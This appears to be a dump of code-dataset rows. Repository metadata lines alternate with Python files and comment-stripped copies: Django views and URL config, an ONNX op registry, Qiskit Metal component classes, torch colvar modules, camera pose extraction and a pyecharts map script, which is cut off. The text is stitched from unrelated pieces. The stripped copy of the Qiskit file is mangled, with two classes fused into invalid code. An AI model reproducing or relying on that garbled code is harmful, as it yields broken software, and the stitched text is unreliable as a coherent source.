fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)),
mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)),
toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']),
NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
| true
| true
|
f705b5f35286918ebf4f6eb85dc49797c87f040f
| 2,375
|
py
|
Python
|
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
|
PacktPublishing/Django-3-Web-Development-Cookbook
|
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
|
[
"MIT"
] | 159
|
2019-11-13T14:11:39.000Z
|
2022-03-24T05:47:10.000Z
|
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
|
PacktPublishing/Django-3-Web-Development-Cookbook
|
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
|
[
"MIT"
] | 34
|
2019-11-06T08:32:48.000Z
|
2022-01-14T11:31:29.000Z
|
ch05/myproject_virtualenv/src/django-myproject/myproject/apps/example/views.py
|
PacktPublishing/Django-3-Web-Development-Cookbook
|
6ffe6e0add93a43a9abaff62e0147dc1f4f5351a
|
[
"MIT"
] | 103
|
2019-08-15T21:35:26.000Z
|
2022-03-20T05:29:11.000Z
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.utils.timezone import now as tz_now
@login_required
def start_page(request):
# dummy view to illustrate all custom template filters and tags
obj = {
"created": tz_now() - timedelta(days=3),
"content": f"""
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
<figure>
<img src="{settings.STATIC_URL}site/img/logo.svg" alt="" />
<figcaption>Logo</figcaption>
</figure>
<p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p>
""",
"website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/",
"content_to_parse": u"""
{% if request.user.is_authenticated %}
Hello, {{ request.user.username }}!
{% else %}
Hello anonymous visitor!
{% endif %}
""",
}
return render(request, "index.html", {
"object": obj,
})
| 67.857143
| 880
| 0.722947
|
from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.utils.timezone import now as tz_now
@login_required
def start_page(request):
obj = {
"created": tz_now() - timedelta(days=3),
"content": f"""
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
<figure>
<img src="{settings.STATIC_URL}site/img/logo.svg" alt="" />
<figcaption>Logo</figcaption>
</figure>
<p>Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?</p>
""",
"website": "https://docs.djangoproject.com/en/dev/howto/custom-template-tags/",
"content_to_parse": u"""
{% if request.user.is_authenticated %}
Hello, {{ request.user.username }}!
{% else %}
Hello anonymous visitor!
{% endif %}
""",
}
return render(request, "index.html", {
"object": obj,
})
| true
| true
|
f705b6a65b0a1a3cce1c1b27d5be5e9b86cb5570
| 2,458
|
py
|
Python
|
python/athena/onnx/handler.py
|
sj1104/Het
|
81b7e9f0f593108db969fc46a1af3df74b825230
|
[
"Apache-2.0"
] | 2
|
2021-12-05T07:11:04.000Z
|
2021-12-15T07:53:48.000Z
|
python/athena/onnx/handler.py
|
sj1104/Het
|
81b7e9f0f593108db969fc46a1af3df74b825230
|
[
"Apache-2.0"
] | null | null | null |
python/athena/onnx/handler.py
|
sj1104/Het
|
81b7e9f0f593108db969fc46a1af3df74b825230
|
[
"Apache-2.0"
] | 3
|
2021-04-01T22:39:13.000Z
|
2021-04-21T11:51:57.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import inspect
from athena.onnx import constants
class athena_op:
_OPSETS = collections.OrderedDict()
_MAPPING = None
def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs):
if not isinstance(name, list):
name = [name]
self.name = name
if not isinstance(onnx_op,list):
onnx_op=[onnx_op]*len(name)
self.onnx_op=onnx_op
self.domain = domain
self.kwargs = kwargs
def __call__(self, func):
opset = athena_op._OPSETS.get(self.domain)
if not opset:
opset = []
athena_op._OPSETS[self.domain] = opset
for k, v in inspect.getmembers(func, inspect.ismethod):
if k.startswith("version_"):
version = int(k.replace("version_", ""))
while version >= len(opset):
opset.append({})
opset_dict = opset[version]
for i,name in enumerate(self.name):
opset_dict[name] = (v,self.onnx_op[i], self.kwargs)
return func
@staticmethod
def get_opsets():
return athena_op._OPSETS
@staticmethod
def create_mapping(max_onnx_opset_version):
mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version}
ops_mapping = {}
for domain, opsets in athena_op.get_opsets().items():
for target_opset, op_map in enumerate(opsets):
m = mapping.get(domain)
if m:
if target_opset <= m and op_map:
ops_mapping.update(op_map)
athena_op._MAPPING = ops_mapping
return ops_mapping
@staticmethod
def find_effective_op(name):
"""Find the effective version of an op create_mapping.
This is used if we need to compose ops from other ops where we'd need to find the
op that is doing to be used in the final graph, for example there is a custom op
that overrides a onnx op ...
:param name: The operator name.
"""
map_info = athena_op._MAPPING.get(name)
if map_info is None:
return None
return map_info
| 29.97561
| 92
| 0.6131
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import inspect
from athena.onnx import constants
class athena_op:
_OPSETS = collections.OrderedDict()
_MAPPING = None
def __init__(self, name,onnx_op=None, domain=constants.ONNX_DOMAIN, **kwargs):
if not isinstance(name, list):
name = [name]
self.name = name
if not isinstance(onnx_op,list):
onnx_op=[onnx_op]*len(name)
self.onnx_op=onnx_op
self.domain = domain
self.kwargs = kwargs
def __call__(self, func):
opset = athena_op._OPSETS.get(self.domain)
if not opset:
opset = []
athena_op._OPSETS[self.domain] = opset
for k, v in inspect.getmembers(func, inspect.ismethod):
if k.startswith("version_"):
version = int(k.replace("version_", ""))
while version >= len(opset):
opset.append({})
opset_dict = opset[version]
for i,name in enumerate(self.name):
opset_dict[name] = (v,self.onnx_op[i], self.kwargs)
return func
@staticmethod
def get_opsets():
return athena_op._OPSETS
@staticmethod
def create_mapping(max_onnx_opset_version):
mapping = {constants.ONNX_DOMAIN: max_onnx_opset_version}
ops_mapping = {}
for domain, opsets in athena_op.get_opsets().items():
for target_opset, op_map in enumerate(opsets):
m = mapping.get(domain)
if m:
if target_opset <= m and op_map:
ops_mapping.update(op_map)
athena_op._MAPPING = ops_mapping
return ops_mapping
@staticmethod
def find_effective_op(name):
map_info = athena_op._MAPPING.get(name)
if map_info is None:
return None
return map_info
| true
| true
|
f705b7c9ba1ebdfedca5661e5e709e360e52da9e
| 4,993
|
py
|
Python
|
tutorials/resources/my429_qcomponents.py
|
TomVethaak/qiskit-metal
|
0fd3049b16a2b28dc6890b696d67329a91da70b9
|
[
"Apache-2.0"
] | 167
|
2021-03-17T20:35:17.000Z
|
2022-03-31T13:25:04.000Z
|
tutorials/resources/my429_qcomponents.py
|
TomVethaak/qiskit-metal
|
0fd3049b16a2b28dc6890b696d67329a91da70b9
|
[
"Apache-2.0"
] | 307
|
2021-03-17T14:07:43.000Z
|
2022-03-23T14:22:20.000Z
|
tutorials/resources/my429_qcomponents.py
|
TomVethaak/qiskit-metal
|
0fd3049b16a2b28dc6890b696d67329a91da70b9
|
[
"Apache-2.0"
] | 122
|
2021-03-17T14:21:24.000Z
|
2022-03-18T10:09:38.000Z
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
from qiskit_metal import draw, Dict
from qiskit_metal.qlibrary.core import QComponent
class MyQComponent1(QComponent):
"""Demonstration1 - Straight segment with variable width/length"""
### def __init__() <- comes from QComponent
### Initiaizes base variables such as self.id, self.name and self.options
### Also launches the first execution of make()
### def rebuild() <- comes from QComponent
### Clear output from previous runs of make() (geom/pin/net) and re-runs it
def make(self):
"""calculates the geometries of the QComponent"""
rect = draw.rectangle(0.5, 0.1, 0, 0) #width, height, pos_x, pos_y
# add_geometry() expects shapely, thus the use of drawn module above
self.add_qgeometry('poly', {'my_polygon': rect},
layer=1,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1],
0.1) #name, tangent, width
class MyQComponent2(QComponent):
"""Demonstration2 - Straight segment with variable width/length"""
# Your knobs to modify the cell behavior
default_options = Dict(width='0.5mm',
height='0.1mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
"""Default drawing options"""
def make(self):
"""calculates the geometries of the QComponent"""
p = self.parse_options(
) # short-handle alias for the options interpreter
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent3(QComponent):
"""Demonstration2 - Straight segment with variable width/length"""
default_options = Dict(width='0.5mm',
height='0.1mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
"""Default drawing options"""
# Name prefix of component + import of renderer-specific default_options
component_metadata = Dict(
short_name='Trace',
_qgeometry_table_path='False', #wirebonds
_qgeometry_table_poly='True',
_qgeometry_table_junction='False') #gds imports and analysis inputs
"""Component metadata"""
def make(self):
"""calculates the geometries of the QComponent"""
p = self.parse_options() # short-handle alias. Options interpreter
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent4(QComponent):
    """Demonstration3 - a straight CPW-style trace: a center path plus a
    wider subtracted cut, with a normal-oriented input pin."""

    default_options = Dict(width='0.5mm',
                           height='0.1mm',
                           gap='0.02mm',
                           pos_x='0mm',
                           pos_y='0mm',
                           layer='1')
    """Default drawing options"""

    # Name prefix of the component + which renderer tables are populated.
    component_metadata = Dict(
        short_name='Trace',
        _qgeometry_table_path='True',  #wirebonds
        _qgeometry_table_poly='False',
        _qgeometry_table_junction='False')  #gds
    """Component metadata"""

    def make(self):
        """Build this component's qgeometry from the parsed options."""
        opts = self.parse_options()
        half_w = opts.width / 2

        # Center conductor: a horizontal line rendered as a path of width
        # `height`.
        trace = draw.LineString([(-half_w, 0), (half_w, 0)])
        trace = draw.translate(trace, opts.pos_x, opts.pos_y)
        self.add_qgeometry('path', {'trace': trace},
                           width=opts.height,
                           layer=opts.layer,
                           subtract=False)

        # Subtracted cut: slightly longer and wider by 2*gap on each side.
        cut = draw.LineString([(-half_w - 2 * opts.gap, 0),
                               (half_w + 2 * opts.gap, 0)])
        cut = draw.translate(cut, opts.pos_x, opts.pos_y)
        self.add_qgeometry('path', {'cut': cut},
                           width=opts.height + 2 * opts.gap,
                           layer=opts.layer,
                           subtract=True)

        self.add_pin('in', trace.coords[::-1], opts.height, input_as_norm=True)
| 38.705426
| 81
| 0.567795
|
from qiskit_metal import draw, Dict
from qiskit_metal.qlibrary.core import QComponent
class MyQComponent1(QComponent):
er='1')
def make(self):
p = self.parse_options(
)
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent3(QComponent):
default_options = Dict(width='0.5mm',
height='0.1mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
component_metadata = Dict(
short_name='Trace',
_qgeometry_table_path='False',
_qgeometry_table_poly='True',
_qgeometry_table_junction='False')
def make(self):
p = self.parse_options()
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
self.add_qgeometry('poly', {'my_polygon': rect},
layer=p.layer,
subtract=False)
self.add_pin('in', rect.exterior.coords[:-3:-1], p.height)
class MyQComponent4(QComponent):
default_options = Dict(width='0.5mm',
height='0.1mm',
gap='0.02mm',
pos_x='0mm',
pos_y='0mm',
layer='1')
component_metadata = Dict(
short_name='Trace',
_qgeometry_table_path='True',
_qgeometry_table_poly='False',
_qgeometry_table_junction='False')
def make(self):
p = self.parse_options()
line = draw.LineString([(-p.width / 2, 0), (p.width / 2, 0)])
line = draw.translate(line, p.pos_x, p.pos_y)
self.add_qgeometry('path', {'trace': line},
width=p.height,
layer=p.layer,
subtract=False)
line2 = draw.LineString([((-p.width / 2) - 2 * p.gap, 0),
((p.width / 2) + 2 * p.gap, 0)])
line2 = draw.translate(line2, p.pos_x, p.pos_y)
self.add_qgeometry('path', {'cut': line2},
width=p.height + 2 * p.gap,
layer=p.layer,
subtract=True)
self.add_pin('in', line.coords[::-1], p.height, input_as_norm=True)
| true
| true
|
f705b7eb5329fb67c4342d7f6f4f2089a9062d8f
| 1,324
|
py
|
Python
|
torchfes/colvar/fix.py
|
AkihideHayashi/torchfes1
|
83f01525e6071ffd7a884c8e108f9c25ba2b009b
|
[
"MIT"
] | null | null | null |
torchfes/colvar/fix.py
|
AkihideHayashi/torchfes1
|
83f01525e6071ffd7a884c8e108f9c25ba2b009b
|
[
"MIT"
] | null | null | null |
torchfes/colvar/fix.py
|
AkihideHayashi/torchfes1
|
83f01525e6071ffd7a884c8e108f9c25ba2b009b
|
[
"MIT"
] | null | null | null |
import math
from typing import Dict, Union, List
import torch
from torch import nn, Tensor
from .. import properties as p
def fix_msk(mol: Dict[str, Tensor], idx: Tensor):
    """Return a boolean (atoms, dims) mask that is True for atoms in *idx*."""
    n_atm, n_dim = mol[p.pos].size()[1:]
    mask = torch.zeros([n_atm, n_dim], dtype=torch.bool, device=idx.device)
    mask[idx, :] = True
    return mask
class Fix(nn.Module):
    """Accumulate a fixed-atom mask into the molecule dictionary.

    Each forward pass ORs the mask for the configured atom indices into
    ``mol[p.fix_msk]``, creating the entry when it is absent.
    """
    idx: Tensor

    def __init__(self, idx: Union[Tensor, List[int]]):
        super().__init__()
        if isinstance(idx, list):
            idx = torch.tensor(idx)
        self.register_buffer('idx', idx)

    def forward(self, mol: Dict[str, Tensor]):
        out = mol.copy()
        mask = fix_msk(mol, self.idx).unsqueeze(0)
        if p.fix_msk in out:
            out[p.fix_msk] = out[p.fix_msk] | mask
        else:
            out[p.fix_msk] = mask
        return out
class FixGen(nn.Module):
    """Collective variable that selects the coordinates of the fixed atoms.

    The ``pbc`` buffer is filled with inf — presumably marking this colvar
    as non-periodic; confirm against the colvar framework's convention.
    """
    pbc: Tensor
    idx: Tensor

    def __init__(self, idx: Union[Tensor, List[int]], num_dim: int):
        super().__init__()
        if isinstance(idx, list):
            idx = torch.tensor(idx, dtype=torch.long)
        num_out = idx.numel() * num_dim  # one output per fixed atom per dim
        self.register_buffer('idx', idx)
        self.register_buffer('pbc', torch.ones(num_out) * math.inf)

    def forward(self, mol: Dict[str, Tensor]):
        mask = fix_msk(mol, self.idx)
        return mol[p.pos][:, mask]
| 27.020408
| 70
| 0.586858
|
import math
from typing import Dict, Union, List
import torch
from torch import nn, Tensor
from .. import properties as p
def fix_msk(mol: Dict[str, Tensor], idx: Tensor):
_, atm, dim = mol[p.pos].size()
msk = torch.zeros([atm, dim], dtype=torch.bool, device=idx.device)
msk[idx, :] = True
return msk
class Fix(nn.Module):
idx: Tensor
def __init__(self, idx: Union[Tensor, List[int]]):
super().__init__()
if isinstance(idx, list):
idx = torch.tensor(idx)
self.register_buffer('idx', idx)
def forward(self, mol: Dict[str, Tensor]):
out = mol.copy()
msk = fix_msk(mol, self.idx)[None, :, :]
if p.fix_msk not in out:
out[p.fix_msk] = msk
else:
out[p.fix_msk] = out[p.fix_msk] | msk
return out
class FixGen(nn.Module):
pbc: Tensor
idx: Tensor
def __init__(self, idx: Union[Tensor, List[int]], num_dim: int):
super().__init__()
if isinstance(idx, list):
idx = torch.tensor(idx, dtype=torch.long)
n = idx.numel() * num_dim
self.register_buffer('idx', idx)
self.register_buffer('pbc', torch.ones(n) * math.inf)
def forward(self, mol: Dict[str, Tensor]):
msk = fix_msk(mol, self.idx)
return mol[p.pos][:, msk]
| true
| true
|
f705b8a080b3d7d64d5acef4a26a5ac0ae6a0be5
| 675
|
py
|
Python
|
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
|
akathpal/UMD-CMSC733-ComputerVision
|
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
|
[
"MIT"
] | 1
|
2022-03-30T05:03:10.000Z
|
2022-03-30T05:03:10.000Z
|
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
|
akathpal/UMD-CMSC733-ComputerVision
|
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
|
[
"MIT"
] | null | null | null |
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
|
akathpal/UMD-CMSC733-ComputerVision
|
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
|
[
"MIT"
] | 1
|
2022-03-30T05:03:09.000Z
|
2022-03-30T05:03:09.000Z
|
import numpy as np
import sys
sys.dont_write_bytecode = True
def ExtractCameraPose(E, K):
U, S, V_T = np.linalg.svd(E)
W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
# print("E svd U", U)
# print("E svd S", S)
# print("E svd U[:, 2]", U[:, 2])
R = []
C = []
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
C.append(U[:, 2])
C.append(-U[:, 2])
C.append(U[:, 2])
C.append(-U[:, 2])
for i in range(4):
if (np.linalg.det(R[i]) < 0):
R[i] = -R[i]
C[i] = -C[i]
return R, C
| 21.774194
| 52
| 0.463704
|
import numpy as np
import sys
sys.dont_write_bytecode = True
def ExtractCameraPose(E, K):
U, S, V_T = np.linalg.svd(E)
W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
R = []
C = []
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
C.append(U[:, 2])
C.append(-U[:, 2])
C.append(U[:, 2])
C.append(-U[:, 2])
for i in range(4):
if (np.linalg.det(R[i]) < 0):
R[i] = -R[i]
C[i] = -C[i]
return R, C
| true
| true
|
f705b953a933a6e69681d0fcfe62b07584f75861
| 1,058
|
py
|
Python
|
app/user/views.py
|
frankRose1/recipe-app-api
|
0fff174ecb59bb06e6b631a33e34984e2f12f68a
|
[
"MIT"
] | null | null | null |
app/user/views.py
|
frankRose1/recipe-app-api
|
0fff174ecb59bb06e6b631a33e34984e2f12f68a
|
[
"MIT"
] | null | null | null |
app/user/views.py
|
frankRose1/recipe-app-api
|
0fff174ecb59bb06e6b631a33e34984e2f12f68a
|
[
"MIT"
] | null | null | null |
from rest_framework import generics, authentication, permissions
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from user.serializers import UserSerializer, AuthTokenSerializer
class CreateUserView(generics.CreateAPIView):
    """Create a new user in the system."""
    # The generic CreateAPIView supplies the create handler; only the
    # serializer needs to be declared here.
    serializer_class = UserSerializer
class CreateTokenView(ObtainAuthToken):
    """Create a new auth token for a user."""
    serializer_class = AuthTokenSerializer
    # Use the project-wide default renderers (e.g. the browsable API).
    renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class ManageUserView(generics.RetrieveUpdateAPIView):
    """Retrieve and update the authenticated user."""
    serializer_class = UserSerializer
    # Token authentication identifies the caller; IsAuthenticated rejects
    # anonymous requests.
    authentication_classes = (authentication.TokenAuthentication,)
    permission_classes = (permissions.IsAuthenticated,)

    def get_object(self):
        """Retrieve and return the authenticated user."""
        # authentication_classes would have populated the request with the
        # authenticated user if they provided a valid token
        return self.request.user
| 35.266667
| 74
| 0.780718
|
from rest_framework import generics, authentication, permissions
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from user.serializers import UserSerializer, AuthTokenSerializer
class CreateUserView(generics.CreateAPIView):
serializer_class = UserSerializer
class CreateTokenView(ObtainAuthToken):
serializer_class = AuthTokenSerializer
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class ManageUserView(generics.RetrieveUpdateAPIView):
serializer_class = UserSerializer
authentication_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
def get_object(self):
return self.request.user
| true
| true
|
f705ba86509d02480a6aad1d5e160ac7369c37b3
| 748
|
py
|
Python
|
myblog/urls.py
|
kubruslihiga/djangotutorial
|
c13c5267761a4aaa422271b4220d8e724fccd37a
|
[
"Apache-2.0"
] | null | null | null |
myblog/urls.py
|
kubruslihiga/djangotutorial
|
c13c5267761a4aaa422271b4220d8e724fccd37a
|
[
"Apache-2.0"
] | null | null | null |
myblog/urls.py
|
kubruslihiga/djangotutorial
|
c13c5267761a4aaa422271b4220d8e724fccd37a
|
[
"Apache-2.0"
] | null | null | null |
"""myblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
    # Only the Django admin site is routed; application URLs are not wired
    # in yet.
    path('admin/', admin.site.urls),
]
| 34
| 77
| 0.708556
|
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| true
| true
|
f705bbab14c4d76328f030a10cda3c1c25aff596
| 63
|
py
|
Python
|
test.sh.py
|
MarcAntoineAlex/query-selector-1
|
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
|
[
"Apache-2.0"
] | null | null | null |
test.sh.py
|
MarcAntoineAlex/query-selector-1
|
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
|
[
"Apache-2.0"
] | null | null | null |
test.sh.py
|
MarcAntoineAlex/query-selector-1
|
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
|
[
"Apache-2.0"
] | null | null | null |
# Demonstrates that zip truncates to the shorter of its inputs:
# only the pairs (0, 0) and (1, 1) are printed.
for a, b in zip([0, 1, 2], [0, 1]):
    print(a, b)
| 15.75
| 22
| 0.412698
|
a = [0, 1, 2]
b = [0, 1]
for a, b in zip(a, b):
print(a, b)
| true
| true
|
f705bbcb1c4c4102c9bcfce19fd7880e846a49e3
| 3,851
|
py
|
Python
|
python业务代码/地图散点可视化/2/plot_city_machine.py
|
RobinYaoWenbin/Python-CommonCode
|
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
|
[
"MIT"
] | 12
|
2020-09-28T03:25:03.000Z
|
2022-03-20T07:44:09.000Z
|
python业务代码/地图散点可视化/2/plot_city_machine.py
|
RobinYaoWenbin/Python-CommonCode
|
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
|
[
"MIT"
] | null | null | null |
python业务代码/地图散点可视化/2/plot_city_machine.py
|
RobinYaoWenbin/Python-CommonCode
|
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
|
[
"MIT"
] | 21
|
2020-03-19T00:44:35.000Z
|
2022-01-30T03:46:18.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 7 09:36:45 2019
@author: MyPC
"""
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import math
import pymssql
import numpy as np
import copy
import re
from sklearn import preprocessing
from sklearn.linear_model import LinearRegression
from pyecharts import Map, Geo , Timeline
def get_data_signalmachine():
    """Load per-city sales counts from Data.xlsx.

    Returns a DataFrame with one row per year and one column per city,
    plus a 'total' column holding the per-year sum.
    """
    df = pd.read_excel('Data.xlsx' , sheet_name='example')
    # df.fillna(0 , inplace = True)
    # df.set_index('year' , inplace = True)
    # Drop the row number, first-sold-year and grand-total columns.
    df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True)
    df.rename(columns = {'行标签':'city'} , inplace = True)
    df.set_index('city' , inplace = True)
    # Transpose so rows become years and columns become cities.
    df = df.T
    df.rename(columns = {'合计' : 'total'} , inplace = True)
    # print(df)
    return df
def plot_map(df):
    """Render an animated (timeline) scatter map of per-city sales counts.

    One Geo scatter frame is produced per year (row of *df*); frames are
    combined into a pyecharts Timeline and written to final_graph.html.
    """
    # With maptype='china' only provinces and municipalities are shown, and
    # the data keys must then be province/municipality names, e.g.:
    # province_distribution = {'青岛': 22, '龙口': 37.56, ...}
    # provice=list(province_distribution.keys())
    # values=list(province_distribution.values())
    years = list(df.index)
    geos = []
    timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \
                        is_timeline_show = False )
    for index in range(len(years)):
        cities = list(df.columns)
        cities.remove('total')
        values = list(df.loc[years[index] , :])
        # The last value is the per-year total ('total' column); show it as
        # the frame title rather than as a map point.
        total_num = values[-1]
        del(values[-1])
        # print(cities)
        # print(values)
        geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \
